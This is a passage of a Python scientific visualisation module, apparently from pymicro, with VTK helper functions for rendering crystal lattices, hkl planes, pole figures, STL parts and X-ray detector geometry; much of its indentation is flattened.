    return edge_actor
def lattice_vertices(grid, sphereRadius=0.1, sphereColor=blue):
'''
Create the 3D representation of crystal lattice atoms.
*Parameters*
**grid**: vtkUnstructuredGrid
The vtkUnstructuredGrid instance representing the crystal lattice.
**sphereRadius**: float
Size of the spheres representing the atoms (default: 0.1).
**sphereColor**: vtk color
Color of the spheres representing the atoms (default: blue).
*Returns*
    The method returns a vtk actor for the lattice vertices.
'''
# Create a sphere to use as a glyph source for vtkGlyph3D.
Sphere = vtk.vtkSphereSource()
Sphere.SetRadius(sphereRadius)
Sphere.SetPhiResolution(40)
Sphere.SetThetaResolution(40)
Vertices = vtk.vtkGlyph3D()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Vertices.SetInputData(grid)
else:
Vertices.SetInput(grid)
Vertices.SetSourceConnection(Sphere.GetOutputPort())
# Create a mapper and actor to display the glyphs.
SphereMapper = vtk.vtkPolyDataMapper()
SphereMapper.SetInputConnection(Vertices.GetOutputPort())
SphereMapper.ScalarVisibilityOff()
    vertices_actor = vtk.vtkActor()
    vertices_actor.SetMapper(SphereMapper)
    vertices_actor.GetProperty().SetDiffuseColor(sphereColor)
    return vertices_actor
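# A minimal sketch combining the two helpers above, assuming pymicro's
# `Lattice` class is importable (as referenced in the docstrings of this
# module). It returns an assembly with both the edge tubes and the vertex
# spheres for a 2x2x2 block of cubic cells.
def _demo_lattice_actors():
    from pymicro.crystal.lattice import Lattice
    cubic = Lattice.cubic(1.0)
    grid = lattice_grid(cubic, m=2, n=2, p=2)
    assembly = vtk.vtkAssembly()
    assembly.AddPart(lattice_edges(grid))
    assembly.AddPart(lattice_vertices(grid))
    return assembly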
def crystal_vertices(crystal, origin=(0., 0., 0.), m=1, n=1, p=1, hide_outside=True):
'''
    Create the 3D representation of the atoms in a given crystal, taking
    into account the crystal lattice and the basis, which can be composed
    of any motif.
    :param crystal: the crystal to display.
    :param tuple origin: cartesian coordinates of the origin.
    :param int m: the number of cells in the [100] direction (1 by default).
    :param int n: the number of cells in the [010] direction (1 by default).
    :param int p: the number of cells in the [001] direction (1 by default).
    :param bool hide_outside: do not display atoms outside the displayed unit cells if True.
    :return: a vtk actor with all the crystal atoms.
'''
data = vtk.vtkPolyData()
# sphere glyph for one atom
Sphere = vtk.vtkSphereSource()
Sphere.SetPhiResolution(20)
Sphere.SetThetaResolution(20)
points = lattice_points(crystal._lattice, origin, m, n, p)
# setup a vtkGlyph3D instance
Vertices = vtk.vtkGlyph3D()
Vertices.SetScaleModeToScaleByScalar()
Vertices.SetScaleFactor(1.0)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Vertices.SetInputData(data)
else:
Vertices.SetInput(data)
Vertices.SetSourceConnection(Sphere.GetOutputPort())
Vertices.SetColorModeToColorByScalar()
# Create a mapper and actor to display the glyphs.
SphereMapper = vtk.vtkPolyDataMapper()
SphereMapper.SetInputConnection(Vertices.GetOutputPort())
SphereMapper.ScalarVisibilityOn()
atom_points = vtk.vtkPoints()
color_scalars = vtk.vtkFloatArray()
color_scalars.SetName('color')
radius_scalars = vtk.vtkFloatArray()
radius_scalars.SetName('radius')
radius = 0.1 * min(crystal._lattice._lengths) # default for atoms
bounds = np.array([m, n, p]) * crystal._lattice._lengths
for pid in range(points.GetNumberOfPoints()):
point = points.GetPoint(pid)
for l in range(len(crystal._basis)):
basis_position = crystal._basis[l] * crystal._lattice._lengths
position = np.array(point) + np.array(basis_position)
# if needed skip things outside
eps = 1e-6
            if hide_outside and (position[0] - origin[0] > bounds[0] + eps or
                                 position[1] - origin[1] > bounds[1] + eps or
                                 position[2] - origin[2] > bounds[2] + eps):
                continue
atom_points.InsertNextPoint(position)
color_scalars.InsertNextValue(float(l))
radius_scalars.InsertNextValue(crystal._sizes[l] * min(crystal._lattice._lengths))
data.SetPoints(atom_points)
    # prepare a scalar array with two components: radius and color
scalar_data = vtk.vtkFloatArray()
scalar_data.SetNumberOfComponents(2)
scalar_data.SetNumberOfTuples(color_scalars.GetNumberOfTuples())
scalar_data.CopyComponent(0, radius_scalars, 0)
scalar_data.CopyComponent(1, color_scalars, 0)
scalar_data.SetName('scalar_data')
data.GetPointData().AddArray(scalar_data)
data.GetPointData().SetActiveScalars('scalar_data')
# make the corresponding lut
lut = vtk.vtkLookupTable()
N = len(crystal._basis)
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
color = crystal._colors[i]
lut.SetTableValue(i, color[0], color[1], color[2])
lut.SetRange(0, N - 1)
SphereMapper.SetLookupTable(lut)
SphereMapper.ColorByArrayComponent('scalar_data', 1)
atoms = vtk.vtkActor()
atoms.SetMapper(SphereMapper)
return atoms
def crystal_3d(crystal, origin=(0., 0., 0.), m=1, n=1, p=1, \
sphereRadius=0.1, tubeRadius=0.02, sphereColor=blue, tubeColor=grey, hide_outside=True):
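    '''
    Create a 3D representation of a crystal, combining the lattice edges
    with the atoms of the basis motif.
    Note that `sphereRadius` and `sphereColor` are currently unused since
    the atoms are drawn by `crystal_vertices` using the sizes and colors
    attached to the crystal basis.
    :param crystal: the crystal to display.
    :param tuple origin: cartesian coordinates of the origin.
    :param int m: the number of cells in the [100] direction (1 by default).
    :param int n: the number of cells in the [010] direction (1 by default).
    :param int p: the number of cells in the [001] direction (1 by default).
    :param bool hide_outside: do not display atoms outside the displayed unit cells if True.
    :return: a vtk assembly combining the lattice edges and the crystal atoms.
    '''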
assembly = vtk.vtkAssembly()
grid = lattice_grid(crystal._lattice, origin, m, n, p)
(a, b, c) = crystal._lattice._lengths
edges = lattice_edges(grid, tubeRadius=tubeRadius * a, tubeColor=tubeColor)
vertices = crystal_vertices(crystal, origin, m, n, p, hide_outside)
assembly.AddPart(edges)
assembly.AddPart(vertices)
assembly.SetOrigin(origin) # m*a/2, n*b/2, p*c/2)
assembly.AddPosition(-np.array(origin)) # -m*a/2, -n*b/2, -p*c/2)
return assembly
def lattice_3d(lattice, origin=(0., 0., 0.), m=1, n=1, p=1, \
sphereRadius=0.05, tubeRadius=0.02, sphereColor=black, tubeColor=grey, \
crystal_orientation=None, show_atoms=True, show_edges=True, cell_clip=False):
'''
Create the 3D representation of a crystal lattice.
The lattice edges are shown using a vtkTubeFilter and the atoms are
displayed using spheres. Both tube and sphere radius can be controlled.
Crystal orientation can also be provided which rotates the whole
assembly appropriately.
    The origin of the actor can either be specified directly using a
    tuple or set using a string as follows:
    * 'mid' the middle of the lattice cell(s)
.. code-block:: python
l = Lattice.cubic(1.0)
cubic = lattice_3d(l)
ren = vtk.vtkRenderer()
ren.AddActor(cubic)
render(ren, display=True)
.. figure:: _static/lattice_3d.png
:width: 300 px
:height: 300 px
:alt: lattice_3d
:align: center
A 3D view of a cubic lattice.
:param Lattice lattice: The Lattice instance representing the crystal lattice.
:param tuple or string origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
:param float sphereRadius: Size of the spheres representing the atoms (default: 0.05).
:param float tubeRadius: Radius of the tubes representing the atomic bonds (default: 0.02).
:param tuple sphereColor: Color of the spheres representing the atoms (default: black).
    :param tuple tubeColor: Color of the tubes representing the atomic bonds (default: grey).
    :param crystal_orientation: The crystal :py:class:`~pymicro.crystal.microstructure.Orientation` with respect to the sample coordinate system (default: None).
    :param bool show_atoms: Control if the atoms are shown (default: True).
    :param bool show_edges: Control if the edges of the lattice are shown (default: True).
    :param bool cell_clip: Clip the lattice points glyphs by the cell (default: False).
    :return: The method returns a vtk assembly combining lattice edges and vertices.
'''
(a, b, c) = lattice._lengths
if origin == 'mid':
origin = (m * a / 2, n * b / 2, p * c / 2)
grid = lattice_grid(lattice, (0., 0., 0.), m, n, p) # we use the actor origin
edges = lattice_edges(grid, tubeRadius=tubeRadius * min(lattice._lengths), tubeColor=tubeColor)
vertices = lattice_vertices(grid, sphereRadius=sphereRadius * min(lattice._lengths), sphereColor=sphereColor)
assembly = vtk.vtkAssembly()
if show_edges: assembly.AddPart(edges)
if show_atoms:
if cell_clip:
# use boolean operation
epsilon = 1.e-6
cube = vtk.vtkCubeSource()
cube.SetCenter(a / 2, b / 2, c / 2)
cube.SetXLength(a + epsilon)
cube.SetYLength(b + epsilon)
cube.SetZLength(c + epsilon)
strips = vtk.vtkStripper()
strips.SetInputConnection(cube.GetOutputPort())
strips.Update()
            triangles = vtk.vtkTriangleFilter()
            triangles.SetInputConnection(strips.GetOutputPort())
bool_filter = vtk.vtkBooleanOperationPolyDataFilter()
bool_filter.SetOperation(bool_filter.VTK_INTERSECTION)
bool_filter.SetInputConnection(0, triangles.GetOutputPort())
bool_filter.SetInputConnection(1, vertices.GetMapper().GetInputAlgorithm().GetOutputPort())
clip_mapper = vtk.vtkPolyDataMapper()
clip_mapper.SetInputConnection(bool_filter.GetOutputPort(0))
clip_mapper.SetScalarVisibility(0)
clip_actor = vtk.vtkActor()
clip_actor.SetMapper(clip_mapper)
clip_actor.GetProperty().SetColor(sphereColor)
assembly.AddPart(clip_actor)
else:
assembly.AddPart(vertices)
# finally, apply crystal orientation to the lattice
apply_translation_to_actor(assembly, -np.array(origin))
# assembly.SetOrigin(origin)#m*a/2, n*b/2, p*c/2)
    if crystal_orientation is not None:
apply_orientation_to_actor(assembly, crystal_orientation)
return assembly
def lattice_3d_with_planes(lattice, hklplanes, plane_origins=None, plane_colors=None, show_normal=True,
plane_opacity=1.0, **kwargs):
'''
Create the 3D representation of a crystal lattice.
HklPlanes can be displayed within the lattice cell with their normals.
A single vtk actor in form of an assembly is returned.
Additional parameters are passed to the `lattice_3d` method to control how the lattice is pictured.
.. code-block:: python
l = Lattice.cubic(1.0)
o = Orientation.from_euler([344.0, 125.0, 217.0])
        hklplanes = HklPlane.get_family('111')
cubic = lattice_3d_with_planes(l, hklplanes, show_normal=True, \\
plane_opacity=0.5, crystal_orientation=o)
s3d = Scene3D()
s3d.add(cubic)
s3d.render()
.. figure:: _static/cubic_crystal_3d.png
:width: 300 px
:alt: lattice_3d_with_planes
:align: center
A 3D view of a cubic lattice with all four 111 planes displayed.
:param lattice: An instance of :py:class:`~pymicro.crystal.lattice.Lattice` corresponding to the crystal lattice to be displayed.
:param hklplanes: A list of :py:class:`~pymicro.crystal.lattice.HklPlane` instances to add to the lattice.
:param plane_origins: A list of tuples describing the plane origins (must be the same length as `hklplanes`), if None, the planes are created to pass through the middle of the lattice (default).
:param plane_colors: A list of tuples describing the plane colors (must be the same length as `hklplanes`), if None, the planes are left gray (default).
:param bool show_normal: Control if the slip plane normals are shown (default: True).
:param float plane_opacity: A float number in the [0.,1.0] range controlling the slip plane opacity.
:param **kwargs: additional parameters are passed to the `lattice_3d` method.
    :returns: The method returns a vtkAssembly that can be directly added to a renderer.
'''
grid = lattice_grid(lattice)
(a, b, c) = lattice._lengths
if plane_origins:
assert len(plane_origins) == len(hklplanes)
    elif kwargs.get('origin') == 'mid':
origin = (a / 2, b / 2, c / 2)
else:
origin = (0., 0., 0.)
if plane_colors:
assert len(plane_colors) == len(hklplanes)
# get the atoms+edges assembly corresponding to the crystal lattice
assembly = lattice_3d(lattice, **kwargs)
# display all the hkl planes within the lattice
for i, hklplane in enumerate(hklplanes):
mid = np.array([a / 2, b / 2, c / 2])
plane = vtk.vtkPlane()
plane.SetOrigin(mid)
plane.SetNormal(hklplane.normal())
plane_color = grey
if plane_colors:
plane_color = plane_colors[i]
hklplaneActor = add_plane_to_grid(plane, grid, mid, color=plane_color, opacity=plane_opacity)
if plane_origins:
origin = plane_origins[i] * np.array([a, b, c]) - mid
hklplaneActor.AddPosition(origin)
hklplaneActor.SetOrigin(-origin)
assembly.AddPart(hklplaneActor)
if show_normal:
# add an arrow to display the normal to the plane
arrowActor = unit_arrow_3d(origin, a * hklplane.normal(), make_unit=False)
assembly.AddPart(arrowActor)
return assembly
def lattice_3d_with_plane_series(lattice, hkl, nps=1, **kwargs):
'''
Create the 3D representation of a crystal lattice with a series of hkl planes.
HklPlanes can be displayed within the lattice cell with their normals.
A single vtk actor in form of an assembly is returned.
Additional parameters are passed to the `lattice_3d` method to control how the lattice is pictured.
.. code-block:: python
l = Lattice.cubic(1.0)
orientation = Orientation.from_euler([0, 54.74, 135]) # correspond to 111 fiber texture
copper = (1.000000, 0.780392, 0.494117) # nice copper color
copper_lattice = lattice_3d_with_plane_series(l, (1, -1, 1), nps=4, crystal_orientation=orientation, \\
origin='mid', show_atoms=True, sphereColor=copper, sphereRadius=0.1)
s3d = Scene3D()
        s3d.add(copper_lattice)
s3d.render()
.. figure:: _static/Cu111_with_planes.png
:width: 400 px
:alt: Cu111_with_planes
:align: center
A 3D view of a copper lattice with a series of successive (111) planes displayed.
:param lattice: An instance of :py:class:`~pymicro.crystal.lattice.Lattice` corresponding to the crystal lattice to be displayed.
:param hkl: A tuple of the 3 miller indices.
:param int nps: The number of planes to display in the series (1 by default).
:param **kwargs: additional parameters are passed to the `lattice_3d_with_planes` method.
    :returns: The method returns a vtkAssembly that can be directly added to a renderer.
'''
p = HklPlane(hkl[0], hkl[1], hkl[2], lattice)
d_hkl = p.interplanar_spacing()
(a, b, c) = lattice._lengths
mid = np.array([0.5 * a, 0.5 * b, 0.5 * c])
hkl_planes = []
plane_origins = []
for i in range(nps):
hkl_planes.append(p)
plane_origins.append(mid - (nps / 2. - 0.5 - i) * d_hkl * p.normal())
return lattice_3d_with_planes(lattice, hkl_planes, plane_origins=plane_origins, **kwargs)
def pole_figure_3d(pf, radius=1.0, show_lattice=False):
"""
Method to display a pole figure in 3d.
    This method displays a sphere of the given radius with a crystal lattice placed at the center (only shown if
    the show_lattice parameter is True). The poles associated with the pole figure are shown on the bounding
    sphere as well as their projection on the equatorial plane.
    :param pf: the `PoleFigure` instance.
    :param float radius: the bounding sphere radius (1 by default).
    :param bool show_lattice: a flag to show the crystal lattice in the center of the sphere.
:return: a vtk assembly that can be added to a `Scene3D` instance.
"""
pole_figure = vtk.vtkAssembly()
orientations = pf.get_orientations()
# keep a list of useful points on the sphere
points_on_sphere = [(0.0, 0.0, -radius)] # first point is the south pole
# get the list of hkl planes
hkl_planes = pf.poles
orientation = orientations[0] # treat only the first orientation for now
g = orientation.orientation_matrix()
gt = g.transpose()
lattice_3d = lattice_3d_with_planes(pf.lattice, hkl_planes,
crystal_orientation=orientation,
show_normal=False,
origin='mid',
tubeRadius=0.2 * radius / 10,
sphereRadius=0.5 * radius / 10,
plane_opacity=0.5)
origin = 0.5 * np.array(pf.lattice._lengths)
for hkl_plane in hkl_planes:
if gt.dot(hkl_plane.normal())[2] < 0:
print('inverting hkl')
hkl_plane._h = -hkl_plane._h
hkl_plane._k = -hkl_plane._k
hkl_plane._l = -hkl_plane._l
points_on_sphere.append(radius * gt.dot(hkl_plane.normal()))
if show_lattice:
# add an arrow to display the normal to the plane
arrow_actor = unit_arrow_3d(origin, radius * hkl_plane.normal())
lattice_3d.AddPart(arrow_actor)
if show_lattice:
pole_figure.AddPart(lattice_3d)
    # add the bounding sphere
sphere_source = vtk.vtkSphereSource()
sphere_source.SetCenter(0.0, 0.0, 0.0)
sphere_source.SetRadius(radius)
sphere_source.SetPhiResolution(300)
sphere_source.SetThetaResolution(300)
sphere_mapper = vtk.vtkPolyDataMapper()
sphere_mapper.SetInputConnection(sphere_source.GetOutputPort())
sphere_mapper.ScalarVisibilityOff()
sphere_actor = vtk.vtkActor()
sphere_actor.SetMapper(sphere_mapper)
sphere_actor.GetProperty().SetOpacity(0.1)
pole_figure.AddPart(sphere_actor)
# draw all the poles on the sphere and lines to the south pole
for i, c in enumerate(points_on_sphere):
pole = vtk.vtkSphere()
pole.SetCenter(c)
pole.SetRadius(radius * 0.05)
pole_cut = vtk.vtkCutter()
pole_cut.SetInputConnection(sphere_source.GetOutputPort())
pole_cut.SetCutFunction(pole)
pole_cut_mapper = vtk.vtkPolyDataMapper()
pole_cut_mapper.SetInputConnection(pole_cut.GetOutputPort())
pole_cut_actor = vtk.vtkActor()
pole_cut_actor.SetMapper(pole_cut_mapper)
pole_cut_actor.GetProperty().SetLineWidth(2.0)
pole_cut_actor.GetProperty().SetColor(black)
pole_figure.AddPart(pole_cut_actor)
if i > 0:
# add a line between the arrow tip and the south pole
line_actor = line_3d(points_on_sphere[0], c)
line_actor.GetProperty().SetLineWidth(2.0)
line_actor.GetProperty().SetDiffuseColor(1.0, 0., 0.)
pole_figure.AddPart(line_actor)
# now add the pole on the equatorial plane
cp = np.array(c) + np.array([0, 0, radius])
cp /= cp[2] / radius # SP'/SP = r/z with r != 1
pole = vtk.vtkRegularPolygonSource()
pole.SetRadius(radius * 0.05)
pole.SetCenter(cp[0], cp[1], 0.0)
pole.SetNumberOfSides(50)
pole_ma = vtk.vtkPolyDataMapper()
pole_ma.SetInputConnection(pole.GetOutputPort())
pole_actor = vtk.vtkActor()
pole_actor.SetMapper(pole_ma)
pole_actor.GetProperty().SetColor(black)
pole_figure.AddPart(pole_actor)
# add the equatorial plane trace on the sphere
equatorial_plane_source = vtk.vtkPlaneSource()
equatorial_plane_source.SetOrigin(-radius, -radius, 0)
equatorial_plane_source.SetPoint1(radius, -radius, 0)
equatorial_plane_source.SetPoint2(-radius, radius, 0)
equatorial_plane = vtk.vtkPlane()
equatorial_plane.SetOrigin(0, 0, 0)
equatorial_plane.SetNormal(0, 0, 1)
equatorial_plane_contour = add_plane_to_grid(equatorial_plane, sphere_source.GetOutput(), None, opacity=1.0)
equatorial_plane_contour.GetProperty().SetLineWidth(2.0)
equatorial_plane_contour.GetProperty().SetColor(black)
pole_figure.AddPart(equatorial_plane_contour)
return pole_figure
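# The equatorial pole positions above are obtained by a stereographic
# projection from the south pole. This hypothetical helper isolates that
# arithmetic: a point c on the sphere is first expressed with respect to the
# south pole, then scaled by r/z (the SP'/SP ratio noted in the code above)
# so the projected pole can be drawn at (cp[0], cp[1]) in the z = 0 plane.
def _stereographic_projection(c, radius=1.0):
    cp = np.array(c) + np.array([0., 0., radius])
    cp /= cp[2] / radius
    return cp[0], cp[1]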
def apply_translation_to_actor(actor, trans):
'''
Transform the actor (or whole assembly) using the specified translation.
:param vtkActor actor: the vtk actor.
:param trans: a 3 component numpy vector or sequence describing the translation to apply in scene units.
'''
transform = actor.GetUserTransform()
    if transform is None:
transform = vtk.vtkTransform()
transform.Identity()
transform.PostMultiply()
transform.Translate(trans[0], trans[1], trans[2])
actor.SetUserTransform(transform)
def apply_rotation_to_actor(actor, R):
'''
Transform the actor with a given rotation matrix.
:param vtkActor actor: the vtk actor.
:param R: a (3x3) array representing the rotation matrix.
'''
transform = actor.GetUserTransform()
if transform is None:
transform = vtk.vtkTransform()
transform.Identity()
m = vtk.vtkMatrix4x4()
m.Identity()
for i in range(3):
for j in range(3):
m.SetElement(i, j, R[i, j])
transform.Concatenate(m)
actor.SetUserTransform(transform)
def apply_orientation_to_actor(actor, orientation):
'''
Transform the actor (or whole assembly) using the specified orientation.
Here we could use the three euler angles associated with the
orientation with the RotateZ and RotateX methods of the actor but
the components of the orientation matrix are used directly since
they are known without any ambiguity.
:param vtkActor actor: the vtk actor.
:param orientation: an instance of the :py:class:`pymicro.crystal.microstructure.Orientation` class
'''
gt = orientation.orientation_matrix().transpose()
apply_rotation_to_actor(actor, gt)
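# A minimal sketch chaining the two helpers above. `apply_rotation_to_actor`
# concatenates onto the actor's current user transform while
# `apply_translation_to_actor` switches it to PostMultiply, so applying the
# orientation first and the translation second keeps the translation
# expressed in sample (laboratory) coordinates.
def _demo_pose_actor(actor, orientation, translation):
    """Hypothetical helper: orient an actor, then place it in the scene."""
    apply_orientation_to_actor(actor, orientation)
    apply_translation_to_actor(actor, translation)
    return actor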
def load_STL_actor(name, ext='STL', verbose=False, color=grey, feature_edges=False):
'''Read a STL file and return the corresponding vtk actor.
:param str name: the base name of the file to read.
:param str ext: extension of the file to read.
:param bool verbose: verbose mode.
:param tuple color: the color to use for the actor.
:param bool feature_edges: show boundary edges (default False).
:return: the 3d solid in the form of a vtk actor.
'''
if verbose:
print('adding part: %s' % name)
part = vtk.vtkSTLReader()
part.SetFileName(name + '.' + ext)
part.Update()
partMapper = vtk.vtkPolyDataMapper()
partMapper.SetInputConnection(part.GetOutputPort())
partActor = vtk.vtkActor()
partActor.SetMapper(partMapper)
partActor.GetProperty().SetColor(color)
if feature_edges:
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(part.GetOutputPort())
edge_mapper = vtk.vtkPolyDataMapper()
edge_mapper.SetInputConnection(extract.GetOutputPort())
edge_mapper.SetScalarVisibility(0)
edge_actor = vtk.vtkActor()
edge_actor.SetMapper(edge_mapper)
edge_actor.GetProperty().SetColor(0, 0, 0)
edge_actor.GetProperty().SetLineWidth(3.0)
stl_part = vtk.vtkAssembly()
stl_part.AddPart(partActor)
stl_part.AddPart(edge_actor)
return stl_part
else:
return partActor
def is_in_array(cad_path, step, origin=[0., 0., 0.]):
"""Function to compute the coordinates of the points within a CAD volume, with a given step."""
part = vtk.vtkSTLReader()
part.SetFileName(cad_path)
part.Update()
# get the bounds of the geometry
bounds = part.GetOutput().GetBounds()
# compute the discretization using the given step
x_sample = np.arange(bounds[0], bounds[1] + step, step) + origin[0]
y_sample = np.arange(bounds[2], bounds[3] + step, step) + origin[1]
z_sample = np.arange(bounds[4], bounds[5] + step, step) + origin[2]
n_x = len(x_sample)
n_y = len(y_sample)
n_z = len(z_sample)
print('discretization: %d x %d x %d points' % (n_x, n_y, n_z))
n_vox = n_x * n_y * n_z
print('total number of voxels is %d' % n_vox)
xx, yy, zz = np.meshgrid(x_sample, y_sample, z_sample, indexing='ij')
all_positions = np.empty((n_x, n_y, n_z, 3), dtype=float)
all_positions[:, :, :, 0] = xx
all_positions[:, :, :, 1] = yy
all_positions[:, :, :, 2] = zz
xyz = all_positions.reshape(-1, all_positions.shape[-1]) # numpy array with the point coordinates
# create our points and the associated cell array
points = vtk.vtkPoints()
points.SetNumberOfPoints(n_vox)
cells = vtk.vtkCellArray()
for i in range(n_vox):
points.InsertPoint(i, xyz[i][0], xyz[i][1], xyz[i][2])
cells.InsertNextCell(vtk.VTK_VERTEX)
cells.InsertCellPoint(i)
select_enclosed_points = vtk.vtkSelectEnclosedPoints()
# assign points to select_enclosed_points
points_poly_data = vtk.vtkPolyData()
points_poly_data.SetPoints(points)
select_enclosed_points.SetInputData(points_poly_data)
# assign surface geometry to select_enclosed_points
select_enclosed_points.SetSurfaceData(part.GetOutput())
select_enclosed_points.Update()
# select_enclosed_points outputs a vtkPolyData object -> exactly what we need to display
polydata = select_enclosed_points.GetOutput()
polydata.SetVerts(cells) # mandatory to see the points
polydata.GetPointData().SetActiveScalars('SelectedPoints')
is_in = numpy_support.vtk_to_numpy(polydata.GetPointData().GetArray('SelectedPoints'))
return is_in.reshape((n_x, n_y, n_z)), xyz
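# A minimal usage sketch for `is_in_array`, assuming a hypothetical STL file
# 'part.stl' in the working directory. The returned mask can be used to
# restrict a regular simulation grid to the CAD volume.
def _demo_is_in_array():
    inside, xyz = is_in_array('part.stl', step=1.0)
    print('%d of %d grid points are inside the part' % (inside.sum(), inside.size))
    return inside, xyz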
def read_image_data(file_name, size, header_size=0, data_type='uint8', verbose=False):
'''
vtk helper function to read a 3d data file.
    The size is needed in the form (x, y, z) as well as a string describing
    the data type in numpy format (uint8 is assumed by default).
    Lower left file orientation and little endian byte order are assumed.
*Parameters*
**file_name**: the name of the file to read.
**size**: a sequence of three numbers describing the size of the 3d data set
**header_size**: size of the header to skip in bytes (0 by default)
**data_type**: a string describing the data type in numpy format ('uint8' by default)
**verbose**: verbose mode (False by default)
*Returns*
A VTK data array
'''
vtk_type = to_vtk_type(data_type)
if verbose:
print('reading scan %s with size %dx%dx%d using vtk type %d' %
(file_name, size[0], size[1], size[2], vtk_type))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(vtk_type)
reader.SetFileDimensionality(3)
reader.SetHeaderSize(header_size)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(file_name)
reader.Update()
data = reader.GetOutput()
return data
def data_outline(data, corner=False, color=black):
'''
vtk helper function to draw a bounding box around a volume.
'''
if corner:
outlineFilter = vtk.vtkOutlineCornerFilter()
else:
outlineFilter = vtk.vtkOutlineFilter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
outlineFilter.SetInputData(data)
else:
outlineFilter.SetInput(data)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outlineFilter.GetOutputPort())
outline = vtk.vtkActor()
outline.SetMapper(outlineMapper)
outline.GetProperty().SetColor(color)
return outline
def box_3d(origin=(0, 0, 0), size=(100, 100, 100), line_color=black):
"""
Create a box of a given size.
:param tuple origin: the origin of the box in the laboratory frame.
:param tuple size: the size of the box.
:param line_color: the color to use to draw the box.
    :return: a vtkActor of the box drawn as wireframe.
"""
box_source = vtk.vtkCubeSource()
box_source.SetBounds(origin[0], origin[0] + size[0],
origin[1], origin[1] + size[1],
origin[2], origin[2] + size[2])
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(box_source.GetOutputPort())
box = vtk.vtkActor()
box.SetMapper(mapper)
box.GetProperty().SetRepresentationToWireframe()
box.GetProperty().SetColor(line_color)
return box
def detector_3d(detector, image_name=None, show_axes=False, see_reference=True):
"""
    Create a 3D detector on a 3D scene, using all tilts.
    The see_reference option plots the outline of a reference detector (same size, no tilts) with a dashed line.
    :param detector: a RegArrayDetector2d instance.
    :param str image_name: the file name of an image to map onto the 3D detector (e.g. 'image.png').
    :param bool show_axes: display the detector (u, v, w) axes (False by default).
    :param bool see_reference: display the reference detector outline (True by default).
    :return: a vtk assembly of the detector.
"""
from pymicro.xray.detectors import RegArrayDetector2d
assembly = vtk.vtkAssembly()
detector_3d = vtk.vtkPlaneSource()
    # TODO: we should define the detector plane with its origin in the top left corner, but currently this would
    # need to flip the image to fit our geometrical conventions, probably due to the way the texture is rendered.
detector_3d.SetOrigin(0., detector.get_size_mm()[0] / 2, -detector.get_size_mm()[1] / 2)
detector_3d.SetPoint1(0., -detector.get_size_mm()[0] / 2, -detector.get_size_mm()[1] / 2)
detector_3d.SetPoint2(0., detector.get_size_mm()[0] / 2, detector.get_size_mm()[1] / 2)
planeMapper = vtk.vtkPolyDataMapper()
planeMapper.SetInputConnection(detector_3d.GetOutputPort())
plane_actor = vtk.vtkActor()
plane_actor.SetMapper(planeMapper)
if image_name is not None:
# image to plot in the detector
reader = vtk.vtkPNGReader()
reader.SetFileName(image_name)
        #TODO: we could use the detector data directly here
texture = vtk.vtkTexture()
texture.SetInputConnection(reader.GetOutputPort())
plane_actor.SetTexture(texture)
# rotate the detector according to the tilts angles
apply_rotation_to_actor(plane_actor, detector.R)
assembly.AddPart(plane_actor)
if show_axes:
# add detector axes actor
axes_detector = axes_actor(15, axisLabels=('u', 'v', 'w'), fontSize=20, color=(0.619, 0.156, 0.886))
XYZ2uvw = np.array([detector.u_dir, detector.v_dir, detector.w_dir])
apply_rotation_to_actor(axes_detector, XYZ2uvw.T)
apply_translation_to_actor(axes_detector, detector.pixel_to_lab(0, 0)[0] - detector.ref_pos)
assembly.AddPart(axes_detector)
if see_reference:
det_ref = RegArrayDetector2d(size=(detector.size[0], detector.size[1]), tilts=(0., 0., 0.))
det_ref.pixel_size = detector.pixel_size
det_ref.ref_pos = detector.ref_pos
detector_3d_ref = vtk.vtkPlaneSource()
detector_3d_ref.SetOrigin(0., det_ref.get_size_mm()[0] / 2, -det_ref.get_size_mm()[1] / 2)
detector_3d_ref.SetPoint1(0., -det_ref.get_size_mm()[0] / 2, -det_ref.get_size_mm()[1] / 2)
detector_3d_ref.SetPoint2(0., det_ref.get_size_mm()[0] / 2, det_ref.get_size_mm()[1] / 2)
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(detector_3d_ref.GetOutputPort())
planeMapperRef = vtk.vtkPolyDataMapper()
planeMapperRef.SetInputConnection(extract.GetOutputPort())
planeMapperRef.SetScalarVisibility(0)
plane_actor_ref = vtk.vtkActor()
plane_actor_ref.SetMapper(planeMapperRef)
plane_actor_ref.GetProperty().SetColor(0, 0, 0)
plane_actor_ref.GetProperty().SetLineWidth(1.0)
plane_actor_ref.GetProperty().SetLineStipplePattern(0xf0f0)
assembly.AddPart(plane_actor_ref)
apply_translation_to_actor(assembly, detector.ref_pos)
return assembly
def build_line_mesh(points):
'''Function to construct a vtkUnstructuredGrid representing a line mesh.
:param list points: the list of points.
:returns line_mesh: the vtkUnstructuredGrid.
'''
line_mesh = vtk.vtkUnstructuredGrid()
nodes = vtk.vtkPoints()
nodes.SetNumberOfPoints(len(points))
for i in range(len(points)):
(x, y, z) = points[i]
nodes.InsertPoint(i, x, y, z)
line_mesh.SetPoints(nodes)
for i in range(len(points) - 1):
Ids = vtk.vtkIdList()
Ids.InsertNextId(i)
Ids.InsertNextId(i + 1)
        line_mesh.InsertNextCell(vtk.VTK_POLY_LINE, Ids)  # cell type 4 is a poly line
return line_mesh
def line_actor(line_grid):
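    '''Create a vtkActor from a line mesh, as built by `build_line_mesh`.
    :param line_grid: the vtkUnstructuredGrid instance representing the line mesh.
    :returns: a vtkActor of the line mesh.
    '''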
line_mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
line_mapper.SetInputData(line_grid)
else:
line_mapper.SetInput(line_grid)
line_actor = vtk.vtkActor()
line_actor.SetMapper(line_mapper)
return line_actor
def line_3d(start_point, end_point):
'''Function to draw a line in a 3d scene.
:param tuple start_point: the line starting point.
:param tuple end_point: the line ending point.
